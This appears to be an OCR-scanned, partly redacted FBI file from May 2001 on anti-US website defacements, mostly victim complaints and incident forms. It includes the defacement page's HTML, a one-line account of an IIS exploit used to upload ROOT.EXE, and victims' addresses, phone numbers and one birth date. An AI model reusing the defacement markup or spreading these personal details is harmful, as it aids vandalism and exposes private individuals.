in their own learning style and from their own computer ---» 


eSentials! 
; Presenting eSentials, a subscription service of Nortel Networks product 
ij information designed to help you recall important data when you need it ---* 


New vLearning Products 
m What :s vLearning? 


Students can actively participate in real time from almost anywhere, 
interacting with the instructor and each other ---» 


Global Knowledge Nortel Networks Training 


http://get.globalknowledge.com/norteltraining/news/_main.asp 5/21/01 


View Message e e Page 1 of 1 
T 


[AT&T BUSINESS INTERNET SERVICES 


| Home | Help Center Registration Center Software Center 


View Message 


erry from: ee bic 
eG hecleMail) To; "dallas@fbi.gov" <dallas@fbi.gov> 
cc: 

Date: Thu, May 10, 2001, 18:50:23 


' Subject: Attn: Computer Squad 
View . 989525768.003 


Account Center 


CLOG OFF : 


Intrusion/Hacker into our web site. On 5/7/01 our web site was hacked and 
changed to the following "fuck USA Government", “fuck PoizonBOx", 
contact:sysadmen@yahoo.com.cn then again on 5/9 or 5/46 with the same 


changes. 


Is there any way we can find out who is doing this? 


oe : zx Consulting Engineers, Inc 


2711 N. Haskell Ave. 400 Cityplace 
Dallas, Texas 75204 
Voice: (214)-874-0200 Fax: 


b6 
b7C 


(214)-824-1155 


Email CADD dwgs. To: 


‘Forward Mail S 


ae 


CONTACT US PRIVACY LEGAL SERVICETERMS ATLCOM 


https://services.prserv.net/svc?type-WOMF&FL-1&p208-belgRoLya&p200-EN&p201—AT] 5/10/01 


SA-82 o o Page 1 of2 


SCHMIDT & 


STACY CONSULTING 
ENGINEERS 


SCHMIDT & STACY Consulting Engineers, Inc. provides Mechanical, Electrical, Plumbing, Fire Pr 
Life Safety, and Energy Management Systems engineering design services for a diverse range of pr 
including high-rise buildings, hotels and resorts (1.e., Ritz Carlton, Marriott, Hilton, etc.), multi-fam 
apartments/lofts, retail pads (i.e., Autonation and Bass Pro Shops across the country), institutions an 
manufacturing facilities. The firm was founded in 1992 by David A. Schmidt, P.E. & Edgar A. Stac 
P.E. and currently includes a staff of 36 professionals & support. The two principals have over 45 c 
years of experience in consulting engineering and the project managers’ combined experience excee 
years. In the past several years, the principals of Schmidt & Stacy have designed over ten million s 
of shell office, hotel, and industrial space and have continued to provide repeat business for 
owners/developers and local/national architects in 34 states nationwide. 


Our CADD Department is equipped with Dell Pentium III Workstations running AutoCAD 2000 in 
Windows NT* network environment. 


* Windows NT isa registered trademark of Microsoft. 


httn-//wrwrw schmidt-«tacv cam/ NIINI 


i S-N-S-2 e e i Page 2 of 2 


Schmidt & Stacy Consulting Engineers 
400 Cityplace 
2711 N. Haskell Ave. 
Dallas, Texas 75204 
Voice: (214) 874-0200 Fax: (214) 824-1155 


Microso. m i | 
AS iere Fey 


Best experienced with Click here to start. 


Microsoft is a registered trademark and the Microsoft Internet Explorer Logo is a trademark of Microsoft. 


htt hr Schmidt-stacv. com/ : 5/21/01 
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FD-71, (Rev. 3-27-95) 
Complaint Form e tt Co Ps í 
$5 ob e 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: Negative [ ) See below 


Character of case 


Matter 


Subject's name and aliases 


contact:sysadmcneyahoo.com.cn 


Protect Source 


Complainant 


The Pilcher's Group 


Complaint received 


Date 05/09/2001 Time am 


[I Personal Telephonic 


Complainant's address and telephone number 


7001 Preston Rd . 200, Dallas 
214/520-2800 


Complainant's DOB 


Address of Subject 


Birth date and birth place 


Scars, marks and other data 


Employer dress Telephone 


Vehicle Description 


Facts of Complaint 


Age [] Female 


Subject’s 
Description 


Poncieidsnt (C) stated that bis business, The Pilcher's 
Group, has been victimized due to a website hacking, occurring on 
05/04/2001. . 


C's index page was removed and placed with a page that reads as 
follows: fuck USA Government 
fuck PoizonBOx 


contact :sysadmene@eyahoo.com.cn 


C' company computer specialist was able to remove said index 
page; however, C was concerned that the hacking could occur again. 


Do not write in this space. 


Complaint received by) BLOCK. STAMP 


aleAl 
LEM noL be. H 


b6 
b"7C 


b3 
b6 
b7C 
b7E 


b6 
b7C 


Attached is .a facsimile copy of the message C's company. 
received. 


This communication is being referred to sa| UR 
NIPCIP Squad,.Dallas Division, for whatever action deemed. 


appropriate. 


The 
Pilcbers 
Group 


Facsimile Cover Sheet 


To: FBI Duty Desk] | Date: May 9, 2001. 
From: |] |]  . Time: 4:00PM 


Subject: Business Website Hacking Fax#: 214-922-7459 


Number of pages including this page:. p 
*** Please call 214.520.2800 if error occurs in transmission: *** 


Original to follow in mail: Yes Ne X 


Comments: 

. As per my phone report to you this afternoon, sometime between Jast Friday, May 4* and 
this afternoon someone “hacked” our business web site at www. pilchers.com, replacing the index 
(opening) page with the attached. On screen the attached was a black background: with red 
letters. My Web Manager has since removed the page and replaced it with a temporary index 
page that returns the links to our normal site. Given that we just discovered this earlier this 
afternoon, we have not yet completed our review, but at this time we believe the index page was 
the only file changed. 


Thank you for whatever assistance you may offer in eliminating this threat in the future, 
Please do not hesitate to contact me for further information. 


Lhe material transmitted herewith is intended only Jor the use of the individual to whom this transmittal is addressed. If the 
reader is not the intended recipient, you are hereby notified that any dissemination, distribution or copying of the material 
transmitted herewith iz strictly prohibited. i 


7001 Preston Road e Suite 200, LRLS » Dallas, Texas 75205 


PIA KINO 500^ m V4. 214 LIN VOTE 


b6 
b7C 


fuck USA Government 
fuck PoizonBOx 


contact:sysadmcn@yahoo.com.cn 


http://Awww.pilchers.com/ 


5/9/01 - 


TOTAL P.@2 


LI 


The Pilchers Group 


http://www.pilchers.com/ 
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-- The Pilchers Group Biograph ® R e Page 1 of 1 


Company Information... 


THE PILCHERS GROUP 


The Pilchers Group is a real estate investment and development concern based in Dallas, Texas. 
Pilchers' current projects are located throughout Texas, as well as in California and Oklahoma. 


Pilchers and affiliates have acquired or developed in excess of $100 million in real estate assets over the 
past ten years. Pilchers' development activities are primarily in the area of retail shopping centers or 
build-to-suit properties for national tenants. Additionally, Pilchers' developments have included office, 
industrial and single family residential, as well as land development activities. 


Over the course of the last ten years, Pilchers' Dallas office has overseen the acquisition of in excess of 
1,000,000 square feet of retail shopping center space for its own account. As a part of its retail 
development activity, Pilchers is regularly involved in build-to-suit contstruction for national and 
regional tenants. 


During the course of the coming year Pilchers intends to add to its current portfolio through additional 


acquisitions of existing retail shopping center space, as well as to seek retail development opportunities 
throughout the southwestern United States. 


Go Back 


http://www.pilchers.com/coinfo.html 5/21/01 


FD-71 (Rev. 3-27-95) @ E e 


Complaint Form 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: C] Negative [ See below 


Subject's name and aliases l Character of case 


Unsubs 


D. |Benten Co so 


Complaint received 


Lj Personal Telephonic Date 05/10/2001 Time am i 


Address of Subject Complainant's address and telephone number 


Complainant's DOB 


E marks and other data 


Employer Address Telephone 


Vehicle Description 


Facts of Complaint 


es a | is. Sena to Northwest. High School, 
Denton, Texas, advised a group Of people are hackin 1 


school's website and putting in messages that re 
government", "fuck poison", "BOx". 
Gf 
He stated they were- able to trace “the hacking to Najing 
University in Peikingj, China, address 
"www.NJU.edu.cn/njue/, rofile/profile/president. htm. 


Subject’s 
ip 


raj | 
(Complaint received by) i BLOCK STAMP 
sey ye 2$ 4 
-— IQR. SEL OF 0. 


b6 
b7C 


b6 
b7c 


b6 
b7C 


b6 
May 8, 2001 | A 
Fro 

For Perry Equipment Corp. 


Wolters Industrial Park 
Mineral Wells TX, 76967 


To: FBI 

2601 Meacham Blvd 
Suite 500 

Ft. Worth TX, 76137 


Atn[ ] 


. To whom it may concern, 


On Sunday morning, May 6, 2001 I discovered that the website, www.pecousa.com, for - 
Perry Equipment Corp. had unauthorized changes made to it. Attached to this letter is the 
actual page as it appeared on the Internet. It was a Black Background with Red text. I 
changed the background to white so I could print it. Also attached in text format is the 
file itself. Four files were placed in the root folder of the server, default.htm, default.asp, 
index.htm, and index.asp. They were also placed in all other subfolders of the same 
server. All four files are identical except for the name. The timestamp on the files was 
2:50 PM, May 5, 2001. 


The server is Microsoft NT 4.0 with service pack 3.0 and IES 4.0. Our other two servers 
had service packs 4 and 5 on them. No changes were made to those servers. 


Please let me know if I can be of any further assistance to you. 


Sincerel 
b6 


b7C 


940.325.2575 | ] 


mg 
g 
$ 
: 


on 
AAD 


zt) 
UE 


k Ld 
201 E 


i 
: 
È 


b7E 


3:04:05 PM 


5/8/2001 


e xDefault.txt e 


<html><body bgcolor=black><br><br><br><br><br><br> 

<table width=100%><td><p align="center"> 

<font size=7 color=red>fuck USA Government</font> 
<tr><td><p align="center"><font size=7 color=red> 

fuck PoizonBOx<tr><td><p align="center"> 

<font size-4 color=red>contact:sysadmcn@yahoo.com.cn</html> 


PERRY EQUIPMENT conor ION, Filtration Element E incr Wells Page l of 2 


MEHR NG INDUSTRY SINCE 1930 
WITH 


ENGINEERED) FILTRATION rimas * 


Corporate Offices: PERRY EQUIPMENT CORPORATION 
P O BOX 640 - WOLTERS INDUSTRIAL PARK 
MINERAL WELLS, TEXAS 76067 USA 


CALL: (940): 
FAX: 940-3 


e-mail - sales@pecousa.com 


http://www.pecousa.com/main2.htm 5/21/01 


From: NIPC-WATCH ence 


To: 
Date: §/15/01 4:23PM 
Subject: China Intrusion 


Subject: Cyber Incident Report Form 


Date: 2001 18:17:26 -0500 (CDT 
From l Re 
To: nipc.watc 1.QOV b7C 


Report. date time-14 May 2001 

Name 

Title= 

Telephone Ees-Munsbe 

Email 

Organization-Rockwall Controls Company 

Addrs Sireet-306 E. Washington 

City=Rockwall 

State=Texas 

Zip Code=75087 

Country=USA 

Question1_Organization=SAME 
Question1_Contact_Info=SAME 
Question1_Tele_Number=SAME 

Question1 Street-SAME 

Questioni City State Zipcd- 

Question1_Country= 

Question1_Email= 

Question2_Location=At above address, 
Question3_Date_Time=Monday 7 May 2001 about 21:00h to 00:00h 
Question4_Critical=No 

Question5 Remarks-No Remarks 
Question6_nature_of_prob=Intrusion 
Question6_nature_of_prob=Unauthorized root access 
Question6_nature_of_prob=Web site defacement l 
Question6 nature of prob-Compromise of system integrity 
Question6_other= 

Question7_exp_problem=No 

Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8 Remarks-( think) exploited MS IIS Sample Website vulnerability to upload ROOT.EXE and 
then execute commands with CMD.EXE to replace default web pages (index.htm, default.asp, etc.) 
Question9 sus perpetrators-Other 

Question9. Remarks-Chinese hackers 
Question1O ip addrs-202.103.134.218 

Questioni1 evid of spoof-Unknown 

Question12 oper systems-VVindows "um. On 
Question12_Remarks=NT Workstation, is = 
Question13_security_infrasture=Firewall 
Question14_attack_loss_info=Unknown 
Question14_Remarks=No Remarks 

Question15 damage systms-No 

Question15 Remarks-No Remarks 

Question16. what actions-Backup of affected system(s) 
Question16 what actions-Other 
Question16_Remarks=Removed IIS sample website & other nonessential options. Reduced file 


permissions to minimum necessary. to oem m memes 
Question17. Field Office= i 
Question17_fieldoff_inform=No 

Question18 agency. inform-No 

Question18, State local Police= 

Question18 Inspector General- 

Question18 CERT-CC- 

Question18 FedCIRC- 

Question18 JTF-CND- 

Question18 Other- 

Question19 date of last update-14 May 2001 

Question19 org work update-zin house 

Question20_POC Information- 

Question20 sys adm contract-No 

Share Info With=Infrastructure Orgs 

Question21_remarks=Defacement was anti-USA government and anti-PoizonBOx. . 


`è 


£ Rockwall Controls Company: Que Solutions 


he ee 


a aa ws 


Dipesan 1010134011 


Job Profiles 
RAA VALE S IUE Bc 


http://www.rockwallcontrols.com/ 5/21/01 


FD-71 (Rev 3-27-95) 
coma ar 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: Negative [J See below 


Character of case 


CITA MATTERS 


Subject's name and aliases 


UNSUB; 


Complaint received 


CL) Personal” Telephonic Date 05/07/2001 Time 3:30 pm 


Complainant's address and telephone number 


1923 Waldrop na, TX 75061 


Telephone qi 
Complainant's DOB 
11/13/1950 Female 

Race Heisht IRE E END Birth date and birth place : 


Scars, marks and other data 


Address of Subject 


Subject's 
Description 


Employer Address Telephone 


Vehicle Description : : 


Facts of Complaint i ; 

Complainant, above address and telephone number, seawN[ — |] 
advised unknown individual had corrupted/altered both of r websites on 
the Internet, as well as that of her supervisor's. explained 


her account is with America On Line; hosting company at designed the 
website and supposedly has control of the website is Waldron ORG; and the 


products to be sold on the website are Herbalife International. 
Additionally, advised she has anti-virus protection. She 
stated the perpetrator left the following E-mail address on the new 
corrupted website: SYSADMCN@YAHOO.COM.CN. She furnished her two 


websites as follows: www.EnergyTex.Com and www.Reach4theSkye.Com; and 
her Supervisor's website as www.Surf4Success.com. mee advised 


Do not write in this space. 


1 - Intelligence Squad 


pc 


(3) 


2 Leo 


IRS 


eceived by) BLOCK STAMP 


b6 
b7C 


b6 
b7C 


b6 
b7C 


m 


teaching i s also corrupted:  www.Wealth-Builders- 
rem.Com. stated she could be contacted at above 
lephone number Tor urther information, etc. 


FBI UI search negative regarding| —  ] 


E e e Page 1 of 1 


To: 

Sent: 3 ; 2001 1:26 PM 
Subject: Hacking incident 

jum 


l'm on your e-mail list. Hope you don't mind my e-mailing you directly. 


Last year I reported numerous 3rd party e-mail attempts to our proxy server from IP addresses 
in mainland China, to the Chinanet authorities, who eventually responded that they had taken 
care of the "situtation." 


On May 6 and 7 this year our proxy server was hacked into and our GroupWise WebAccess 
page was defaced with an obscene message "f*k USA government, f*k PoisonBox." 
Numerous files on the root drive of the server were written over. But, we didn't have any major 
damage Sce. the fech' S time to cen up the server, so | haven't reported it to NIPC. 


We never fi igured Qut how the hacker gotin. A scan of the server found no trojan horses 
lurking anywhere. . We figure our: IP addréss is on the hackers' list of targets because i turned 
them in last year. 


Anyway, all of this is just for your information and | was wondering if you had heard of any 
other defacements in the Dallas/Fort Worth area. Are you aware of specific hacker programs 
that might have been used for this type of attack? Any information would be helpful. 


Thanks, 


E] 
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= s = |. 


777 Main Street, Suite 3600 
Fort Worth, Texas 76102-5341 
Direct Phone: 

Direct Fax: 

E-Mail: 


Fue! JO UC SEX . 5/910 
Cur TES. 
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Sent for infragard : dallas@yahoo.com Yahoo! - My Yahoo! Options - Sign Out - Help 
' “BS Mai E] Addresses E9 Calendar E Notepad’ 
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Free yourself. 


Get Yahoo! Mail on your mobile phone. S 


à d 3 [as attachment si Download Attachments 


Date: Thu, 10 10 May fay 2001 1 15:52:02 -0700 (PDT) 
From: ©infragard_dallas@yahoo.com | Block Address | Add to Ad 
Subject: Hacking Incident 


Rab 
af | 


I read over your hacking email and it resembles the 
worm advisory reported on cert.org - sadmind/IIS. 

Take a look at the advisory and call me on Monday with 
more details. 


Thank you 
Intelligence Research Specialist 


Dallas FBI 
214-574-4680 


Do You Yahoo!? 
Yahoo! Auctions - buy the things you want at great prices 
http: //auctions. yahoo. com/ 


|- Choose Folder - F 


Download Attachments 


Experts ‘Games - "Greetings Home Home P Invites - ihe ‘Maps Member Directory - Messenger: My Yohoo! News - ET People Sen Search - 
Personals - Photos - Shopping - Sports - Stock Quotes - TV - Travel - Weather - Yahooligans - Yellow Pages - more... 


Privacy Policy- Terms of Service - Guidelines 
Copyright © 1994-2001 Yahoo! Inc. All rights reserved. 
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Inbox for infragard_dallas@yahoo.com Yahoo! - My Yahoo! Options - Sign Out - Help 
Peta ' l PA. Mail (2. Addresses Calendar [x Notepad 


Date: Fri, 11 May 2001 04:47:58 -0500 
Frm| || Block Address | Add to Address Book l > 


To: @infragard_dallas@yahoo.com P 


Subject: Re: Hacking Incident 


Thanks so much! I have read the advisory and contacted our tech 

support to find out if they applied the IIS patch mentioned. I know they 
changed rights to directories and files on the server to beef up security 
and ran Windows Update to get NT security patches, but I'm not sure 

what all else they did. We are running IIS 4.0. 


I'll try to follow up with you on Monday. Thanks again. 
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««« <infragard dallas@yahoo.com> 5/10 5:52p >>> 

Hi 

I read over your hacking email and it resembles the 

worm advisory reported on cert.org - sadmind/IIS. 

Take a look at the advisory and call me on Monday with 

more details. 

Thank you 
b6 
b7C 


Intelligence Reséarch Specialist 
Dallas FBI 
214-574-4680 


Do You Yahoo!? 
Yahoo! Auctions - buy the things you want at great prices 


http: //auctions. yahoo. com/ 
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Yahoo! Messenger - Send instant messages to friends! 
Address Book - Alerts - Auctions - Bill Pay - Bookmarks - Briefcase - Broadcast - Calendar - Chat - Classifieds : Clubs - Companion - Domains - 
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HARRIS, FINLEY & BOGE, P.C- 


ATTORNEYS AT LAW 


771 Main STREET - Sus 
FORT WORTH, TEXAS 76 


Harris, Finley & Bogle, a Professional Corporation, is-engaged in the general 
practice of civil law in Fort Worth, Texas, and has the highest rating by 
Martindale-Hubbell Law Directory. The firm consists of nineteen lawyers, four 
paralegals, and support staff. 


The firm has a general business practice and provides a variety of legal services 
to its clients: 


We handle most legal needs of businesses of all sizes, including their 
organization, financing, and operation. 


We represent both state and national banking institutions. Our work primarily 
consists of loan documentation, work outs, litigation, regulatory matters, and 
other banking matters. 


We practice oil and gas law, including leasing, financing, title examination, and 
the purchase and sale of producing properties. 


In the real estate area we represent buyers, sellers, developers, and lenders in 
real estate sales, acquisition, construction, financing, and developing. 


Our estate planning practice includes estate and gift tax planning and the 
preparation of wills, trusts, and other estate planning documents. 


We practice trial law before state and federal courts representing both plaintiffs 
and defendants in all types of litigation. 


Our bankruptcy practice primarily involves representing creditors and trustees in 
liquidation and reorganization proceedings. 


We have a commitment to providing quality lega! services on a prompt basis and 


at a reasonable cost to our clients. 


We welcome questions concerning our fees and any other matters involving the 
representation of our clients. 


All lawyers in the firm are members of the American Bar Association, the State 
Bar of Texas, and the Tarrant County Bar Association. 


HARRIS. FINLEY, & BOGLE. P.C. 
777 MAIN SWRRET - Suite 3600 
FORT WORTH. TX 78102-5341 


5/21/01 


From: NIPC-WATCH 


To: f 
Date: 5/9/01 11:19PM 
Subject: Web site defacement 


The Watch received the following web site defacement: 


Subject: Cyber Incident Report Form 


Date: : + T) 
From: 
To: «nipc.watc i.gov> 


Report, date time-5/9/01 16:30 

Title-l 

Telep 

Email 

Organization= ccess Systems, Inc. . 


Addrs_Street=10731 RockWall Rd. . 

City=Dallas 

State=Tx 

Zip Code=75238 

CountryzUSA 

Question1_Organization=Same 
Question1_Contact_Info= 
Question1_Tele_Number= 
Question1_Street=Same 
Question1_City_State_Zipcd= 

Question1, Country- ; 
Question1_Email= 
Question2_Location=64.158.160.151 

Was attacked by Chinese with vulgarity towards USA Government 
repeated attack at 11:02 same day 
Question3_Date_Time=7:35 05/07/01 
Question4_Critical=Yes 
Question5_crit_infrasture=Telecommunications 
Question5_Remarks=No Remarks 
Question6_nature_of_prob=Intrusion 
Question6_nature_of_prob=Unauthorized root access 
Question6_nature_of_prob=Web site defacement 
Question6_nature_of_prob=Compromise of system integrity 
Question6_nature_of_prob=Unknown 
Question6_other= Cue 
Question7 exp problem-No 
Question7_Remarks=No Remarks 
Question8, method, of attackz Trojan Horse 
Question8 method of attack-Trapdoor 
Question8 Remarks-No Remarks 
Question9_Remarks=No Remarks 
Question10_ip_addrs= 
Question11_evid_of_spoof=Unknown 
Question12 oper systems-NT 

Question12 Remarks-No Remarks 

Question13. security infrasture-Firewall 
Question13 security infrasture-Packet filtering 
Question14 attack loss info-Unknown 
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Question14_Remarks=No Remarks NET 
Question15 damage systms-No 

Questioni5 Remarks=No Remarks — - 
Question16_what_actions=Backup of affected system(s) 
Question16 what, actions-Log files examined 
Question18 Remarks-No Remarks 
Question17 Field Office- 
Question17. fieldoff informzNo 
Question18 agency, informzNo 

Question18 State local Police- 

Question18 Inspector General- 
Question18_CERT-CC= 

Question18 FedCIRC- 

Question18 JTF-CND- 

Question18 Other- . 

Question19 date of last update- 

Question19 org work update- 
Question20 POC Information 
Question20 sys adm .contract-No 

Share Info With-Infrastructure Orgs 
Question21_remarks=No additional remarks 
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Sent for infragard_dallas@yahoo.com Yahoo!- My Yahoo! Options - Sign Out - Help 
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Free yourself. 


Get Yahoo! Mail on your mobile phone. & 


"Reply All. - "Fonware “fas attachment x] Download Attachments 


- Choose Folder - 


4 Next | Sent 
Date: Thu, 10 May 2001 16:04:28 -0700 (PDT) 
From: infragard_dallas@yahoo.com | Block Address | Add to Address Book 


Subject; t 
To 


I read over your computer intrusion report and it 
resembles the "worm" advisory reported on 


www.cert.org: 
CA-2001-11  sadmind/IIS. 


Take a look at the advisory and call me on Monday with 
more details. 


Intelligence Research Specialist 
Dallas - FBI 
214-720-2200 


Do You Yahoo!? 
Yahoo! Auctions - buy the things you want at great prices 
http://auctions.yahoo.com/ 


- Choose Folder - F = Mg ve- 


| Next|[Sent 
] Reply alr -| - Forward. 


s jas attachment ~+] Download Attachments 


Yahoo! Messenger - Send instant messages to friends! 


Experts -Games - Greetings - Home Pages - Invites - Mail - Maps - Member Directory - Messenger - My Yahoo! - News : PayDirect - People Search - 


Personals : Photos - Shopping - Sports - Stock Quotes - TV - Travel - Weather - Yahooligans - Yellow Pages - more... 


Privacy Policy- Terms of Service - Guidelines 
Copyright © 1994-2001 Yahoo! Inc. All rights reserved. 
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Inbox for onmagara dallas @yavecsom aS - My Yahoo! Options - Sign Out - Help 
T Lx 240. a "US "EX ja Ea Addresses s E9c Calendar ip Notepad ' 


O%e Intra APR* 30-Second Credit Decision* Great Rewards 


for purchases! 


*see important 
terms & conditions 


Download Attachments: 


- Choose Folder E E: 


alete. 
IST T IET X 
í MEM Block Address | Add to Address Book 
To:&mnfragard dallas()yahoo.com — — : 


Subject: Re: Web site defacement 
Date: Thu, 10 May 2001 19:10:13 -0500 


Thank you so much 


I will read it and get back to you 


DSX Access Systems, Inc. 


«infragard dallasGyahoo.com» 


Sent: ursday, May ; 2001 6:04 PM 
Subject: Web site defacement 


> I read over your computer intrusion report and it 

» resembles the "worm" advisory reported on 

> www.cert.org: 

> CA-2001-11 sadmind/IIS. 

> 

> Take a look at the advisory and call me on Monday with 
> more details. 


> 
a 
> Intelligence Research Specialist 


> Dallas - FBI 

> 214-720-2200 

> 

> 

> Do You Yahoo!? 

> Yahoo! Auctions - buy the things you want at great prices 


> http: //auctions.yahoo.com/ 
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Inbox for infragard_dallas@yahoo.com Yahoo! - My Yahoo! Options - Sign Out - Help 
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From | Block Address | Add to Address Book l b6 
To: &infragard_dallas@yahoo.com ES 
Subject: Re: Web site defacement 
Date: Tue, 15 May 2001 16:05:48 -0500 


Just another update 
I have been over my log files and can't find the offending ip address 


or uri 
that the attack came from 
but I did see an email that was out of character to 


beendownb4@pinkponys.com 


I have since updated my virus definitions and ran nav on all my server 


hard 
drives with no virus found. 


Thank you for your help 


Sincerel 
DSX SEE M inc. 


abate Original Message ----- 


From: <infragard_dallastyahoo.com> 
To: b6 
Sent: Thursday, May 1 2001 6:04 PM ; p7c 


Subject: Web site defacement 


> I read over your computer intrusion report and it 
» resembles the "worm" advisory reported on l 
> www.cert.org: 

> CA-2001-11 sadmind/IIs. 

> . 

> Take a look at the advisory and call me on Monday with 
> more details. 


> 
— EE Specialist 


Dallas - FBI 
214-720-2200 
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From: : - ! : j Wu rur 
To: 

Date: Thu, May 17, 2001 7:01 PM 

Subject: ncident Report 051701 012 41993 


The following incident report was received on the nipc.watch@fbi.gov e-mail account. It is being 
forwarded for your information/action. It may involved Chinese Hackers. 


Regards, 
NIPC Watch and Warning Unit. 


Subject: Cyber Incident Report Form 

Date: Thu, 17 May 2001 14:22:09 -0500 

From: b6 
To: “nipc.watch@fbi.gov" <nipc.watch@fbi.gov> . b7C 


Report date timez17-May-2001/14:11 

Name £0 
Title 

Telephone Fax Number 

Email 

Organization=Richmont 

Addrs_Street=17855 Dallas Pkwy. 

City=Dallas 

State=TX 

Zip Code=75287 

Country=U.S. 

Question1_Organization=SAME 
Question1_Contact_Info=SAME 
Question1 Tele Number-SAME 

Question1 Street-SAME 

. Question1 City State Zipcd- 

Question1 Country- 

Question1 Email- 

Question2 Location-Same address as indicated above. 
Question3 Date Time-14-May-2001 14:40 
Question4 Critical Yes 
Questions crit infrasture-Other 
Question5_Remarks=Production Email System 
Question6 nature of prob-Intrusion 

Question6 nature of prob-Unauthorized root access 
Question6, nature of prob-Web site defacement 
Question6 nature of prob-Compromise of system integrity 
Question6, nature of prob-Unknown 
Question6_other= 

Question7_exp_problem=No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Unknown 
Question8_Remarks=No Remarks 
Question9_sus_perpetrators=Other 
Question9_Remarks=NIPC Warming 

01-005 


Question10- ip. addrs-146.153.1.15 — Á— 
Question11, evid of spoof-Unknown 
Question12 oper systems-NT 

Questioni? Remarks-No Remarks 
Question13, security infrasture-Firewall 
Question13. security infrasture-Intrusion Detection System 
Question13, security infrasture-Packet filtering 
Question14. attack loss info-Unknown 
Question14_Remarks=No Remarks 

Question15 damage systms-No 

Question15 Remarks=No Remarks 
Question16 what actions-Log files examined 
Question16_Remarks=No Remarks 

Question17, Field Office= 

Question17_fieldoff_inform=No 

Question18_agency_inform=No 

Question18, State local Police= 

Question18, Inspector General- 

Question18 CERT-CC- 

Question18 FedCIRC- 

Question18 JTF-CND- 

Question18_Other= 

Question19 date of last update- 

Question19 org work update- 

Question20 POC Information- 
Question20 sys adm contract-No 
Question21_remarks=Intruder has placed multiple HTML files on a Web server 
root directory and other places. The content of such files Misplays 
profanity toward the US, and an organization. 


The traceroute to the origin is alive and as follows: 


Tracing route to leonera.puc.cl [146.155.1.15] 
over a maximum of 30 hops: 


1 130ms 120ms 120 ms tnt-dal.dallas.net [209.44.40.10] 

2 120ms 110ms 110 ms grf-dal-ge002.dallas.net [209.44.40.9] 

3 120ms 120ms 120 ms atm9-0-04.CR-1.usdlls.savvis.net . 
[209.44.32.9] l 

4 120ms 120ms 111 ms at-1-2-01004.usdlls2-j20c.savvis.net 
[64.241.111 
.173] 

5 321ms 210ms 130 ms frontier.usdils.savvis.net [208.48.18.1] 

6 110ms 110ms 110 ms pos2-2-155M.cr2.DAL 1.gblx.net 
[206.132.251.69] 

7 150ms 150ms 150 ms so2-0-0-2488M.cr2.MIA1.gblx.net 
[206.132.248.137 
| 

8 150ms 150ms 151ms sot-0-0-622M.ar2.MIA1.gblx.net 
[206.132.248.122] 


9 150 ms 151ms 160 ms AdexusSA.ge-0-1-0.101.ar2.MIA1.gblx.net 
[64.209. 
252.166] 
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"^75 =- 10.301 ms 300ms 311ms 64213242 .. . MEC 2. 
11 301ms 310ms 301 ms cisco-rs92-sj.puc.cl [146. 155. 92. 9] 
12 320ms 311ms 300 ms leonera.puc.cl [146.155.1.15] 
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WELCOME TO RICHMONT 


E Richmont is a marketing-focused merchant bank, 
; Poe aie me which creates value by wisely managing private 
ue INVESTMENT : assets in the form of various diverse operating 
z FUNDS companies, reducing debt and investing earnings in 
db CHAIRMAN'S high quality investment vehicles that we control. 
LETTER 

$ PHILOSOPHY Richmont is a family of companies in a variety of 
mg usiness categories, representing more than two 
billion dollars in assets. 


Richmont is a team of talented professionals with <= 
experience across a wide range of disciplines, who 
use their considerable skills to develop and implement business solutio 


Richmont is an 


responsibility. 
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Richmont directly reaches more than 25 million consumers through 
channels, including retail, direct sales and the Internet. Through our ct 
marketing and distribution, Richmont can reach almost every female c 
the United States. 


Richmont is a unique blend of synergies among our companies, our 
technology and our business strategies. 


Richmont combines a multi-billion dollar, international presence witl 
of an entrepreneur. 


Richmont has deep roots while at the same time we are perfectly at 
the new economy of the 21st century. 


Richmont x New York: 

17855 Dailas Parkwav Home . Back to Top 660 Madison Avenue 
Dallas, TX 75287 i5th Floor 

phone: 972-860-7500 New York, NY 10021 
phone: 212-835-205C 
fax: 212-835-2020 


Toronto: 

3300 Bloor Street We 
West Tower, Suite 75 
Ontario MSX 2X2 
phone: 416-234-0734 
fax: 416-234-0993 


Hong Kong: 

19/F./ South Cornwall 
Taikoc Place, 979 Kin. 
Quarry Bay, Hong Kor 
phone: 011-852-252C 
fax: 011-852-2527-8: 


http://www.richmont.com/ 5/21/01 
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FEDERAL BUREAU OF INVESTIGATION 
Precedence: ROUTINE Date: 05/18/2001 
To: “Chicago jl Attn: sal we 
rom: Philadelphia se 
Squad 9 
Contact: SA 215-418-4313 
Approved By: 
Drafted By: 
Case ID id: ending) 
(Pending) 

Title:  Honkers Union of China; 

Chicago Systems Group- Victim; 

Intrusion- Other 
Synopsis: Identifying victim organizations for the above 
captioned investigation. 
Enclosure(s): NIPC Incident Reports, FD-71 reports, email 
complaints, and one (1) insert report covering the complaints 
collected by the Philadelphia FBI concerning the Chinese Hacker 
attacks occurring as of May 18, 2001. 
Details: Philadelphia FBI has received several complaints and 
have identified victims concerning the above investigation. Below 
is a list of victims of the web defacement attack occurring in 
the Philadelphia FBI territory since May 18, 2001: 

1.) MAC DIRECT c/o vw S 


185 Discovery Drive 


Colmar, PA 18915 
(cell) 
2.) MORAVIAN COLLEGE c/of | d 
120 West Greenwich Stree 
3.) PALISADES SCHOOL DISTRICT e| Ww 


39 Thomas Free Drive 
Kintnersville, PA 18930 


(610) 847-5131 ext.[ — ] 


b3 
b7E 


4.) SOLUTION SYSTEMS INC. se 


10 


11 


12 


i3 


14 


-) 


-) 


PON 


To: Chicago From: Philadelphia 
re: [+] 05/18/2001 


114 Forest Avenue 
pono 
CONCORDE INC. c/o| | |] 


1835 Market Street 
12th Floor 


Philadelphia, PA 19103 
UNIGLOBE/WINGS TRAVEL c/o |. | va 
6198 Butler Pike 


B PA 


a re 


TOPLINK Inc. c/o  -— 0] ~ 
103 East Pennsylvania Blvd. 
Festerville, PA 19053 


C 


CRW GRAPHICS INC. c/o 
9100 Pennsauken Highway 
Pennsauken, NJ 08110 


WENT] 


ue 


.) DILWORTH PAXSON, LLP c/o ee |e 


1735 Market Street 


nas i 19103 


.) PHILADELPHIA UNIVERSITY cl sid 
.) VILLAGEAUCTION.COM el e] part 


200 Innovation Blvd. 


-o Park, PA 16803 


o cre —— ] Y^ 


650 Wilson Lane 
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4 To: Chicago From: Philadelphia | T 
b7E 
| roinaa corporation co jv b 


_ 950 Tilton Road 
Northfield, NJ 08225 


